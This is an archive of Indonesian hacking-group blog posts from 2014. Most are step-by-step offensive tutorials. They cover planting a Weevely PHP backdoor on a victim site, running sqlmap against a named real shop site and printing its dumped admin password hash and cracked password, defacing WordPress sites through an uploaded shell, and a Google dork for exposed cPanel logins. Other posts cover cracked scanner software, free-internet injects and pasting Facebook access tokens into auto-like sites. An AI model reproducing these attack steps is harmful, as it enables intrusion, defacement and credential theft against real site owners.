Backconnect dengan Weevely [ Back|Track 5 R3 ]

Posted by Unknown Friday 21 February 2014

Backconnect dengan Weevely [ Back|Track 5 R3 ]

Assalamualaikum sobat IDCA, kesempatan kali ini kami akan memberikan tutorial "Back connect" denganWeevely untuk netcat nanti tutorialnya bisa menyusul. Sebelum melangkah ke tutorialnya kita berkenalan dulu dengan backconnect itu sendiri :D .

Apa itu backconnect ?
Backconnect biasanya digunakan untuk server yg tertutup proxy atau firewall. sehingga tidak bisa di lakukanremote connect. Jadi salah satu triknya adalah membalik koneksi, yaitu mengkoneksikan dari server ke komputer kita.

Oke, sudah sedikit jelas kan? kita lanjut ke tutorial heheh untuk pengguna windows harus instal module python-redline dulu jika ingin menggunakan weevely ^_^

Bahan-bahan :

1. PC / Laptop yang terkoneksi dengan Internet
2. Website yang sudah ditanam shell
3. File Backdoor

Langkah-langkahnya :

1. Buka terminal ( atau tekan CTRL + ALT + T ) , lalu ketikan

cd /pentest/backdoors/web/weevely/" kemudian tekan enter ( Tampilan )

2. Setelah itu kita buat backdoors dulu dengan cara, ketik :

./weevely.py generate [ namafile.php ] , contoh : "./weevely.py generate 0000 bim.php" ( Tampilan )

3. Jika sudah dibuat maka akan muncul tulisan "[generate.php] Backdoor file 'bim.php' created with password '0000'." sekarang coba cek filenya di dir/folder "pentest/backdoors/web/weevely"

4. Sekarang tinggal upload file tersebut ke web yang akan kita back connect.

5. Jika sudah berhasil di upload sekarang kembali ke terminal tadi, lalu ketikan :

./weevely.py [url file backdoors] [password]" sebagai contoh :

./weevely.py http://bimo-cyber.com/tmp/bim.php 0000 ( Tampilan )

Selamat sekarang anda sudah terhubung ke server target, nah untuk tutorial rooting saya bagis setelah dapat WIFI ya hehehe. Jika ada yang kurang jelas silahkan tanyakan di grup kami aja ya, jangan lewat INBOX :)

Selengkapnya

Exploit WordPress Complete Gallery File Upload

Posted by Unknown

Exploit WordPress Complete Gallery File Upload

Assalamualaikum sobat IDCA, karena lagi males bikin artikel jadi mending langsung aja menuju link dibawah yah >_<

TUTORIAL ADA DISINI

Assalamualaikum sobat IDCA, karena lagi males bikin artikel jadi mending langsung aja menuju link dibawah yah >_<

TUTORIAL ADA DISINI

Selengkapnya

Trik Internet Gratis Smartfren

Posted by Unknown

Trik Internet Gratis Smartfren

Status : Trik sudah tidak bisa lagi

Asslamualaikum..

Dalam kehidupan sehari hari, internet merupakan sebuah kebutuhan bagi semua orang. berbagai aktivitas banyak dilakukan di Internet. berbagai layanan diberikan oleh masing masing provider dengan beragam agar mampu memberikan layanan yg terbaik. namun semua itu tak memberikan para pelanggan merasa puas mengingat layanan internet yang diberikan dari provider masih jauh dari harapan. maka dari itu berbagai cara dilakukan agar internet yang digunakan bisa dimanfaatkan secara maksimal. dan salah satunya dibuat menjadi gratisan. :D

Untuk Trik Internet Gratis lainnya klik DISINI

nah disini saya akan memberikan trik internet smartfren agar bisa diakses dengan gratis. silahkan disimak aja yah :*

"Mohon sedikit meyisihkan waktunya untuk memberikan donasi, dengan cara mengklik gambar yg berlabel Sponsor.. Terimakasih "

Bahan bahan yg dibutuhkan:

1. Inject Smartfren + Ultrasurf
3. Modem Smartfren Tanpa kuota dan pulsa

Pertama konekkan dulu modemnya... setelah itu buka injectnya dan klik ON

lalu buka ultrasurfnya.. silahkan di setting dulu proxynya... untuk port samakn denan injectnya.

kalo udah sukses konek ultrasurfnya ke server.. Tinggal browsing dah :)

untuk settingan lainnya liat gambar:

Firefox

IDM

kalo Google Chrome langsung otomatis settingannya dari ultrasurf. udah begitu aja yah,, semoga bermanfaat. harap jangan diperjualbelikan... thanks to Kopaci..

Password : idca

Selengkapnya

Cara Mendapatkan Banyak CPanel Dengan Mudah

Posted by Unknown

Cara Mendapatkan Banyak CPanel Dengan Mudah

Assalamualaikum...

Lagi surfing di google, eh nemu yang beginian,, kocak! wkwkwkw ::D Yah, kali aja ada yang mau nyoba dan bisa dimanfaatin. :D yang ga berkenan, no komen aja :) Cukup simple aja..

Pertama gunakan dork untuk mencari Cpanelnya

inurl:":2082/login/?user="

Lalu masukkan dork ke box pencarian google, dan Enter.

Nah tinggal dibuka satu satu Cpanelnya yah :)

Maaf yah, kalo cuma begitu, lagi males ngapa2in :p Semoga bermanfaat aja :v

Selengkapnya

Deface Dengan SQLMAP di Backtrack 5

Posted by Unknown

Deface Dengan SQLMAP di Backtrack 5

Assalamualaikum Wr, WB,

maaf yah om om sekalian, ane lama gak buat threat baru, nah sekarang mumpung ada waktu ane share nih cara deface website dengan SQLMAP di Backtrack 5 :D

Apa itu SQLMap ?

SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.

[+} BAHAN [+]

Python | Available on Backtrack
Sqlmap | Available on Backtrack

[+] LANGKAHNYA MAS BRO [+]

(*Untuk Windows kalian cari dulu ke sini )

1. Kita cari dulu target yang mau kita scan (*jika ada bugs akan seperti ini)

2. Buka dulu SQLMAPnya, kalo di Backtrack 5 ketikan printah

cd /pentest/web/scanners/sqlmap /

3. Ketikan printah ini :

python sqlmap.py -u http://www.BUGWEBTARGET.com --dbs

Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs

setelah itu klik enter, maka akan muncul Database Target (*See Image)

4. Setelah dapet nama Data Basenya kita ketikan printah :

python sqlmap.py -u http://TARGET.com -D nama_database -tables

Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables [tekan enter] hasil :

5. Setelah dapat table pada databasenya silahkan cari table yang menurut kalian ada USER + PASS website tersebut, kali ini saya coba scan TABLE USER, dengan perintah :

python sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns

Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns [lalu tekan ENTER] maka hasilnya akan seperti ini :

6. Setelah itu kita scan lagi table itu untuk mendapatkan user dan pass admin website, dengan perintah :

python sqlmap.py -u http://www.target.com -D nama_database -T table --dump

Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump [tekan ENTER]

Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip"

do you want to crack them via a dictionary-based attack? [Y/n/q] maka hasilnya :

nah itu kita dapetin User + Passwordnya :D

User : admin

Pass : dfc560ef836a9a63c2bdbfb24a683624

Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pergi ke :

Nah setelah saya Decrypt ane dapetin nih :

Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$

Sekarang tinggal login ke admin dan tebas deh :D

http://www.vana-shop.com/admin/

HASIL :

masih kena deface tuh : http://www.vana-shop.com/

dah yah sekian dulu Postingnya, ane males ngetik lagi KWOKWOWK XD

Semoga berhasil :)

Selengkapnya

Cara Tebas Index Website CMS Wordpress

Posted by Unknown

Cara Tebas Index Website CMS Wordpress

Assalamualaikum,,,

Sekarang ane mau ngasi cara melakukan defacing /merubah halaman muka web ato istilah lainya tebas index.. hehhe

Langsung sajalah... Repot banget dah gitu males ngetik.. wkwkwk :p

Mohon Tutorial ini dibaca, diliat, dipahami dan dicermati baik2 yaahh,, ga ngerti ane jitaakk!! :3

ini untuk CMS Wordpress yah trus ane jg pake madspotshell,, jadi klo sobat pake shell yg lain pasti beda atuh :3

Notice!
Kalo bisa index jangan dirusak! budayakan menghargai hasil kerja keras orang lain! BACKUP Data guys :)

Dowload Madspotshell

Sebelumnya sobat harus bisa tanem shell dulu, klo ga ada shell yg ditanem di web gimana mo nebas indexnya,, wkwkwk :p

bagi sobat yg sudah punya langsung Buka Shellnya yah.. ;)

Saatnya nyari index nya,, dimana??? Dimana Dimana Dimana?? Hajiaahh! Malah nyanyi? -_- hehehe, santai ya sob, ;) Lihat Gambar! untuk mencari index nya sobat cuma perlu mencarinya di Path/folder utama website tsb. biasanya di Public_Html, klo ga ada, pokoknya dalemnya berisi file2 utama seperti: Wp-Login,Wp-Admin,Wp-Config, wp-content, dsb

Liat baik2 gambar diatas! di path utama berisikan semua files website! noh liat ada index.php, udah ketemu kan? kalo mau nyari config, klik aja wp-config.php :p

Ane harap, indexnya jangan dirusak, sebaiknya dibackup,, cukup upload aja file index.html halaman deface sobat! atau bisa juga index.php kita ubah. klik "R" di bagian kanan kemudian sobat rename aja jadiindex.php_backup lalu klik [>>] untuk save!

Keterangan:

R : Rename
E : Edit
D : Download
X : Delete
[>>] : Eksekusi

selanjutnya buatlah file index.php yg baru lalu pastekan script deface sobat, dan save! liat gambar!

kalo sudah, langsung cek aja hasilnya,, :p hmm,, udah ah begitu aje kagak pelu repot2 :p

Selengkapnya

Cara Mencari Halaman Web Login Dengan Acunetix Web Vulnerability Scanner 8

Posted by Unknown

Cara Mencari Halaman Web Login Dengan Acunetix Web Vulnerability Scanner 8

Assalamualaikum sobat2 IDCA.. :p

Hmm,, dilihat dari keluhan2 sobat, kebanyakan saat melakukan eksploitasi web dengan metode SQL Injection, rata rata2 kesulitan menemukan halaman login admin web, jadi sedikit ane share trik nya yahh.. yup langsung di simak aja! :p

kok pake Acunetix, iyah ane kadang make untuk melihat struktur dari website tersebut (Crawler) besar kemungkinan dengan fitur crawler kita bisa mendapatkan direktori sensitif dari website target, seperti cgi, admin, dsb. Sedangkan pada tool-tools admin finders kita mencari dengan cara hanya menggunakan list umum seperti : admin, login, system dsb. jadi kita hanya terpatok di list itu aja .

Lihat Gambar!

Download : Acunetix Web Vulnerability Scanner 8 dan Patch+Key

Password: Lihat

yup begitu saja yah, moga bermanfaat ;)

UPDATE: Link download sudah diperbaiki.. :D

Selengkapnya

Cara Mengganti Tampilan BBM Android

Posted by Unknown

Cara Mengganti Tampilan BBM Android

Selamat sing sobat Indonesian Cyber Army, berhubung ada WiFI gratis sekarang saya mau share tutorial mengganti tampilan BBM di Android. Sebagai contoh yang saya edit ini adalah mengganti "Background dan Bar BBM" di BBM Android versi 1.0.0.70.

Oke kita mulai saja tutorialnya :

Bahan yang diperlukan :

1. apktools ( Jika ingin membuat 2 akun BBM )
2. Patch apk
3. PC / Laptop ( Memakai WinZip sebenarnya juga bisa )
4. Mentahan BBM V.70 ( Buat Uji Coba Saja )

1. Setelah semua file diatas di download sekarang buka Mentahan BBM V.70 dengan WinRar lalu extract file Mentahan BBM V.70 tersebut di folder baru.

2. Untuk pertama kita edit backgroundnya dulu caranya, buka file :

res/drawable

3. Siapkan file yang akan dijadikan background BBM, supaya bisa di install nantinya siapkan gambar dengan resolusi dibawah resolusi HP kalian. Rename menjadi "background.png" setelah itu pindahkan ke folder "res/drawable" pilih saja replace :D

4. Setelah itu kita ubah tampilan bar BBM, caranya buka folder "drawable-hdpi / drawable-mdpi pokoknya yang ada tulisan drawable" lalu ganti file bernama "actionbar_background.png" dengan file bar yang sudah kalian siapkan.

5. Jika sudah selesai, silahkan compile lagi file BBM tadi. Lihat gambar aja :)

6. Nah kalau sudah silahkan pindahkan bbm.apk yang sudah di compile tersebut ke android kalian,

Untuk proses clone aplikasi dan instalasinya silahkan lanjutkan "kesini"

Nanti hasil akhirnya jadi seperti ini :

Selengkapnya

Generator Update Status

Posted by Unknown

Generator Update Status

mau buat sendiri ? baca di; http://indocyberarmy.blogspot.com/2012/12/membuat-status-via-sendiri.html

Selengkapnya

Auto Like With Likelo (+300 Likes)

Posted by Unknown

Auto Like With Likelo (+300 Likes)

Cara menggunakan fitur Auto Like Status Facebook sangatlah sederhana. Tetapi bagi sebagian orang yang masih awam dengan aplikasi ini sebuah panduan sangatlah berarti.

Berikut adalah panduan penggunaannya:

Pertama pastikan anda dalam posisi log in di Facebook

Bukalah alamat situs Auto Like yang ingin anda gunakan, atau bisa dengan klik DISINI

"Mohon sedikit meyisihkan waktunya untuk memberikan donasi, dengan cara mengklik gambar yg berlabel Sponsor.. Terimakasih "

Setelah berhasil masuk ke alamat situsnya perhatikan gambar berikut dan klik link yang ada di bawah tanda panah (Anchor berwarna merah). Untuk mempermudah sebaiknya anda klik kanan dan buka link pada tab baru

Untuk penggunaan pertama kali, akan muncul permintaan izin dari aplikasi developer (biasanya provider selular seperti Samsung, Nokia, Experia dsb). Klik izinkan/pasang pada pojok kanan halaman seperti yang ada pada gambar dibawah ini sehingga pengambilan token atau access ID di nyatakan sukses. Lalu copy token/access ID tersebut dan paste pada kotak token kemudian submit atau tekan enter. Khusus untuk pengguna likelo.com pastikan copy semua alamat url yang ada sebagai access token.

Contoh Token adalah sebagai berikut:http://facebook.com/connect/login_accessAAABempp6Ls0BAHH80NEZAgycxZCnTTJ1dVPudvO64grcpxuFZDZD&typescabs

Jika anda menggunakan Auto Like seperti Powerlike, Machine Like dan sebagainya gunakanlah Kode Token. Posisinya ada di address bar atau kolom alamat URL yang diberikan, ambillah kode yang di mulai dari AAA dan berakhir sebelum tanda &. lihatlah tulisan yang berwarna merah diatas.

Khusus untuk likelo.com pastikan anda mengcopy semua alamat url yang ada di Address Bar sebagai access ID atau Token yang diberikan lalu paste pada kolom token kemudian tekan enter atau klik submit. Contoh Access ID pada likelo.com:http://facebook.com/connect/loginAAAAhdhgfaksdhifklsgdjsgdh98937mabdsjh&typeAnsa

Selanjutnya akan muncul daftar status facebook anda, klik submit pada masing masing status yang ingin di auto like (khusus pengguna likelo.com) atau klik auto like pada status terakhir yang muncul pada aplikasi auto like lainnya. Jika anda di minta mengisi captcha, isilah untuk menghindari spam.

Catatan: Pastikan setelan Facebook anda adalah publik. Jika tidak, maka auto like tidak bisa digunakan. jika facebook anda belum PUBLIK, silahkan anda baca artike (INI)

Selengkapnya

Putra Ranger